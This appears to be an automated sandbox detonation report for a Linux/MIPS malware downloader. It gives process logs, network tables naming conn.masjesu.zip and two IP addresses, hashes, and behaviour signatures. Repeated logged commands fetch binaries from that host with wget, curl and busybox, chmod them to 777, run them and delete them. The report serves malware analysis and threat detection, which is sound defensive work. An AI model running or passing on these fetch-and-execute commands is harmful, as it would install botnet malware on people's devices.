[wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]
/bin/chmod
[chmod 777 JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]
/tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx
[./JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]
/bin/rm
[rm JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]
/bin/chmod
[chmod 777 BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]
/tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa
[./BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]
/bin/rm
[rm BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]
/bin/chmod
[chmod 777 tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]
/tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN
[./tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]
/bin/rm
[rm tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]
/bin/chmod
[chmod 777 idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]
/tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4
[./idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]
/bin/rm
[rm idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]
/bin/chmod
[chmod 777 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]
/tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8
[./4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]
/bin/rm
[rm 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]
/bin/chmod
[chmod 777 DQul2qKd09ITKkHJpETty8DirCA07F1nBT]
/tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT
[./DQul2qKd09ITKkHJpETty8DirCA07F1nBT]
/bin/rm
[rm DQul2qKd09ITKkHJpETty8DirCA07F1nBT]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]
/bin/chmod
[chmod 777 zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]
/tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh
[./zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]
/bin/rm
[rm zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]
/bin/chmod
[chmod 777 teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]
/tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz
[./teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]
/bin/rm
[rm teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]
/bin/chmod
[chmod 777 PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]
/tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx
[./PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]
/bin/rm
[rm PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]
/bin/chmod
[chmod 777 ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]
/tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m
[./ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]
/bin/rm
[rm ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]
/bin/chmod
[chmod 777 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]
/tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS
[./2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]
/bin/rm
[rm 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
Files
/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-20 03:24
Reported
2024-11-20 03:27
Platform
debian9-mipsel-20240611-en
Max time kernel
102s
Max time network
105s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG | /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG | N/A |
| N/A | /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx | /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx | N/A |
| N/A | /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx | /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx | N/A |
| N/A | /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa | /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa | N/A |
| N/A | /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN | /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN | N/A |
| N/A | /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 | /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 | N/A |
| N/A | /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 | /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 | N/A |
| N/A | /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 | /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 | N/A |
| N/A | /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT | /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT | N/A |
| N/A | /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz | /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz | N/A |
| N/A | /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx | /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx | N/A |
| N/A | /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m | /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m | N/A |
| N/A | /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS | /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS | N/A |
| N/A | /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh | /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh | N/A |
| N/A | /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 | /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 | N/A |
| N/A | /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG | /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG | N/A |
| N/A | /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx | /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx | N/A |
| N/A | /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx | /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx | N/A |
| N/A | /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa | /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa | N/A |
| N/A | /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN | /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN | N/A |
| N/A | /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 | /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 | N/A |
| N/A | /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 | /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 | N/A |
| N/A | /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT | /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT | N/A |
| N/A | /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh | /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh | N/A |
| N/A | /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz | /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz | N/A |
| N/A | /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx | /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx | N/A |
| N/A | /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m | /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m | N/A |
| N/A | /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS | /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
